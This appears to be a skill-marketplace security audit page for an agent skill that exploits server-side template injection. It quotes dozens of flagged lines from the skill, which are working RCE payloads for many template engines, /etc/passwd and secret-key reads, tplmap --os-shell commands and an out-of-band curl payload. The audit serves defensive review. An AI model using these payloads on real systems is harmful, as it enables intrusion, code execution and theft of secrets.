exploiting-template-injection-vulnerabilities

Detects and exploits Server-Side Template Injection vulnerabilities in various template engines to achieve remote code execution.

Install this skill

or

0/100

Security score

The exploiting-template-injection-vulnerabilities skill was audited on Jun 14, 2026 and we found 82 security issues across 4 threat categories, including 13 high-severity. Review the findings below before installing.

Categories Tested

Security Issues

high line 188

Direct command execution function call

SourceSKILL.md

188	curl -s "https://target.example.com/page?name=%23set(%24e=%22e%22)%24e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22id%22)"

high line 200

Direct command execution function call

SourceSKILL.md

200	curl -s "https://target.example.com/page?name={%25%20set%20cmd%20=%20'id'%20%25}{{['java.lang.Runtime']\|first.getRuntime().exec(cmd)}}"

high line 244

Eval function call - arbitrary code execution

SourceSKILL.md

244	curl -s "https://target.example.com/page?name={{a]constructor.prototype.charAt=[].join;[\$eval('a]alert(1)//')]()}}"

high line 35

Template literal with variable interpolation in command context

SourceSKILL.md

35	- The positive signal is server-side evaluation of an expression: an arithmetic probe is rendered as its result. Confirm `{{77}}` → `49`, `${77}` → `49`, `#{77}` → `49`, `<%= 77 %>` → `49`, `{

high line 37

Template literal with variable interpolation in command context

SourceSKILL.md

37	- Fingerprint via the divergence test: `{{7'7'}}` → `7777777` = Jinja2, `49` = Twig; `${77}` evaluating = Freemarker/Velocity/Spring EL; `#{7*7}` = Thymeleaf/Ruby. Engine-specific RCE only works aft

high line 39

Template literal with variable interpolation in command context

SourceSKILL.md

39	- Every delimiter set: `{{}}`, `${}`, `#{}`, `<%= %>`, `{}`, `${{}}`, `#set(...)`.

high line 40

Template literal with variable interpolation in command context

SourceSKILL.md

40	- A polyglot that triggers across engines: `${{<%[%'"}}%\` (watch for errors/partial render revealing the engine).

medium line 61

Template literal with variable interpolation in command context

SourceSKILL.md

61

```bash

medium line 97

Template literal with variable interpolation in command context

SourceSKILL.md

97

```bash

medium line 170

Template literal with variable interpolation in command context

SourceSKILL.md

170

```bash

high line 290

Template literal with variable interpolation in command context

SourceSKILL.md

290	A Java-based CMS allows administrators to edit page templates using Freemarker. A lower-privileged editor injects `<#assign ex="freemarker.template.utility.Execute"?new()>${ex("id")}` to execute comma

medium line 192

System command execution

SourceSKILL.md

192	curl -s "https://target.example.com/page?name={system('id')}"

high line 42

Curl to non-GitHub URL

SourceSKILL.md

42	- Blind SSTI: an OOB payload (`{{...os.popen('curl http://OOB')...}}`) when no output is reflected.

medium line 80

Curl to non-GitHub URL

SourceSKILL.md

80	curl -s "https://target.example.com/page?name=$encoded" \| grep -o "49"

medium line 106

Curl to non-GitHub URL

SourceSKILL.md

106	curl -s "https://target.example.com/page?name={{7*'7'}}"

medium line 111

Curl to non-GitHub URL

SourceSKILL.md

111	curl -s "https://target.example.com/page?name={{config}}"

medium line 115

Curl to non-GitHub URL

SourceSKILL.md

115	curl -s "https://target.example.com/page?name=\${.now}"

medium line 119

Curl to non-GitHub URL

SourceSKILL.md

119	curl -s "https://target.example.com/page?name=%23set(%24a=1)%24a"

medium line 123

Curl to non-GitHub URL

SourceSKILL.md

123	curl -s "https://target.example.com/page?name={php}echo%20'test';{/php}"

medium line 127

Curl to non-GitHub URL

SourceSKILL.md

127	curl -s "https://target.example.com/page?name={{%27test%27.class}}"

medium line 140

Curl to non-GitHub URL

SourceSKILL.md

140	curl -s "https://target.example.com/page?name={{config.items()}}"

medium line 143

Curl to non-GitHub URL

SourceSKILL.md

143	curl -s "https://target.example.com/page?name={{config.SECRET_KEY}}"

medium line 147

Curl to non-GitHub URL

SourceSKILL.md

147	curl -s "https://target.example.com/page?name=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD'))")"

medium line 151

Curl to non-GitHub URL

SourceSKILL.md

151	curl -s "https://target.example.com/page?name=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD'))")"

medium line 155

Curl to non-GitHub URL

SourceSKILL.md

155	curl -s "https://target.example.com/page?name=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD'))")"

medium line 159

Curl to non-GitHub URL

SourceSKILL.md

159	curl -s "https://target.example.com/page?name=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD'))")"

medium line 163

Curl to non-GitHub URL

SourceSKILL.md

163	curl -s "https://target.example.com/page?name=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD'))")"

medium line 173

Curl to non-GitHub URL

SourceSKILL.md

173	curl -s "https://target.example.com/page?name={{['id']\|filter('system')}}"

medium line 174

Curl to non-GitHub URL

SourceSKILL.md

174	curl -s "https://target.example.com/page?name={{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}"

medium line 177

Curl to non-GitHub URL

SourceSKILL.md

177	curl -s "https://target.example.com/page?name={{'/etc/passwd'\|file_excerpt(1,30)}}"

medium line 181

Curl to non-GitHub URL

SourceSKILL.md

181	curl -s "https://target.example.com/page?name=<#assign ex=\"freemarker.template.utility.Execute\"?new()>\${ex(\"id\")}"

medium line 184

Curl to non-GitHub URL

SourceSKILL.md

184	curl -s "https://target.example.com/page?name=\${\"freemarker.template.utility.Execute\"?new()(\"whoami\")}"

medium line 188

Curl to non-GitHub URL

SourceSKILL.md

188	curl -s "https://target.example.com/page?name=%23set(%24e=%22e%22)%24e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22id%22)"

medium line 192

Curl to non-GitHub URL

SourceSKILL.md

192	curl -s "https://target.example.com/page?name={system('id')}"

medium line 196

Curl to non-GitHub URL

SourceSKILL.md

196	curl -s "https://target.example.com/page?name=<%25=%20system('id')%20%25>"

medium line 200

Curl to non-GitHub URL

SourceSKILL.md

200	curl -s "https://target.example.com/page?name={%25%20set%20cmd%20=%20'id'%20%25}{{['java.lang.Runtime']\|first.getRuntime().exec(cmd)}}"

medium line 241

Curl to non-GitHub URL

SourceSKILL.md

241	curl -s "https://target.example.com/page?name={{constructor.constructor('alert(1)')()}}"

medium line 244

Curl to non-GitHub URL

SourceSKILL.md

244	curl -s "https://target.example.com/page?name={{a]constructor.prototype.charAt=[].join;[\$eval('a]alert(1)//')]()}}"

medium line 247

Curl to non-GitHub URL

SourceSKILL.md

247	curl -s "https://target.example.com/page?name={{_c.constructor('alert(1)')()}}"

medium line 250

Curl to non-GitHub URL

SourceSKILL.md

250	curl -s "https://target.example.com/" \| grep -i "ng-app\\|angular\\|vue\\|v-"

medium line 257

Curl to non-GitHub URL

SourceSKILL.md

257	curl -s "https://target.example.com/search?q=$encoded" \| grep -oP "49\|alert\|constructor"

high line 158

Access to /etc/passwd

SourceSKILL.md

158	PAYLOAD='{{"".__class__.__mro__[1].__subclasses__()[40]("/etc/passwd").read()}}'

high line 177

Access to /etc/passwd

SourceSKILL.md

177	curl -s "https://target.example.com/page?name={{'/etc/passwd'\|file_excerpt(1,30)}}"

high line 226

Access to /etc/passwd

SourceSKILL.md

226	--download "/etc/passwd" "/tmp/passwd"

high line 318

Access to /etc/passwd

SourceSKILL.md

318	- File system read: /etc/passwd, application source code

low line 174

Access to .env file

SourceSKILL.md

174	curl -s "https://target.example.com/page?name={{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}"

low line 42

External URL reference

SourceSKILL.md

42	- Blind SSTI: an OOB payload (`{{...os.popen('curl http://OOB')...}}`) when no output is reflected.

low line 80

External URL reference

SourceSKILL.md

80	curl -s "https://target.example.com/page?name=$encoded" \| grep -o "49"

low line 106

External URL reference

SourceSKILL.md

106	curl -s "https://target.example.com/page?name={{7*'7'}}"

low line 111

External URL reference

SourceSKILL.md

111	curl -s "https://target.example.com/page?name={{config}}"

low line 115

External URL reference

SourceSKILL.md

115	curl -s "https://target.example.com/page?name=\${.now}"

low line 119

External URL reference

SourceSKILL.md

119	curl -s "https://target.example.com/page?name=%23set(%24a=1)%24a"

low line 123

External URL reference

SourceSKILL.md

123	curl -s "https://target.example.com/page?name={php}echo%20'test';{/php}"

low line 127

External URL reference

SourceSKILL.md

127	curl -s "https://target.example.com/page?name={{%27test%27.class}}"

low line 131

External URL reference

SourceSKILL.md

131	python3 tplmap.py -u "https://target.example.com/page?name=test"

low line 140

External URL reference

SourceSKILL.md

140	curl -s "https://target.example.com/page?name={{config.items()}}"

low line 143

External URL reference

SourceSKILL.md

143	curl -s "https://target.example.com/page?name={{config.SECRET_KEY}}"

low line 147

External URL reference

SourceSKILL.md

147	curl -s "https://target.example.com/page?name=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD'))")"

low line 151

External URL reference

SourceSKILL.md

151	curl -s "https://target.example.com/page?name=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD'))")"

low line 155

External URL reference

SourceSKILL.md

155	curl -s "https://target.example.com/page?name=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD'))")"

low line 159

External URL reference

SourceSKILL.md

159	curl -s "https://target.example.com/page?name=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD'))")"

low line 163

External URL reference

SourceSKILL.md

163	curl -s "https://target.example.com/page?name=$(python3 -c "import urllib.parse; print(urllib.parse.quote('$PAYLOAD'))")"

low line 173

External URL reference

SourceSKILL.md

173	curl -s "https://target.example.com/page?name={{['id']\|filter('system')}}"

low line 174

External URL reference

SourceSKILL.md

174	curl -s "https://target.example.com/page?name={{_self.env.registerUndefinedFilterCallback('exec')}}{{_self.env.getFilter('id')}}"

low line 177

External URL reference

SourceSKILL.md

177	curl -s "https://target.example.com/page?name={{'/etc/passwd'\|file_excerpt(1,30)}}"

low line 181

External URL reference

SourceSKILL.md

181	curl -s "https://target.example.com/page?name=<#assign ex=\"freemarker.template.utility.Execute\"?new()>\${ex(\"id\")}"

low line 184

External URL reference

SourceSKILL.md

184	curl -s "https://target.example.com/page?name=\${\"freemarker.template.utility.Execute\"?new()(\"whoami\")}"

low line 188

External URL reference

SourceSKILL.md

188	curl -s "https://target.example.com/page?name=%23set(%24e=%22e%22)%24e.getClass().forName(%22java.lang.Runtime%22).getMethod(%22getRuntime%22,null).invoke(null,null).exec(%22id%22)"

low line 192

External URL reference

SourceSKILL.md

192	curl -s "https://target.example.com/page?name={system('id')}"

low line 196

External URL reference

SourceSKILL.md

196	curl -s "https://target.example.com/page?name=<%25=%20system('id')%20%25>"

low line 200

External URL reference

SourceSKILL.md

200	curl -s "https://target.example.com/page?name={%25%20set%20cmd%20=%20'id'%20%25}{{['java.lang.Runtime']\|first.getRuntime().exec(cmd)}}"

low line 209

External URL reference

SourceSKILL.md

209	python3 tplmap.py -u "https://target.example.com/page?name=test" --os-shell

low line 212

External URL reference

SourceSKILL.md

212	python3 tplmap.py -u "https://target.example.com/page" -d "name=test" --os-cmd "id"

low line 215

External URL reference

SourceSKILL.md

215	python3 tplmap.py -u "https://target.example.com/page?name=test" \

low line 221

External URL reference

SourceSKILL.md

221	sstimap -u "https://target.example.com/page?name=test"

low line 222

External URL reference

SourceSKILL.md

222	sstimap -u "https://target.example.com/page?name=test" --os-shell

low line 225

External URL reference

SourceSKILL.md

225	python3 tplmap.py -u "https://target.example.com/page?name=test" \

low line 241

External URL reference

SourceSKILL.md

241	curl -s "https://target.example.com/page?name={{constructor.constructor('alert(1)')()}}"

low line 244

External URL reference

SourceSKILL.md

244	curl -s "https://target.example.com/page?name={{a]constructor.prototype.charAt=[].join;[\$eval('a]alert(1)//')]()}}"

low line 247

External URL reference

SourceSKILL.md

247	curl -s "https://target.example.com/page?name={{_c.constructor('alert(1)')()}}"

low line 250

External URL reference

SourceSKILL.md

250	curl -s "https://target.example.com/" \| grep -i "ng-app\\|angular\\|vue\\|v-"

low line 257

External URL reference

SourceSKILL.md

257	curl -s "https://target.example.com/search?q=$encoded" \| grep -oP "49\|alert\|constructor"

Scanned on Jun 14, 2026

View Security Dashboard

Installation guide →

GitHub Stars 606

Rate this skill

Categorydevelopment

UpdatedJune 15, 2026

openclaw api security-engineer development

xalgord/xalgorix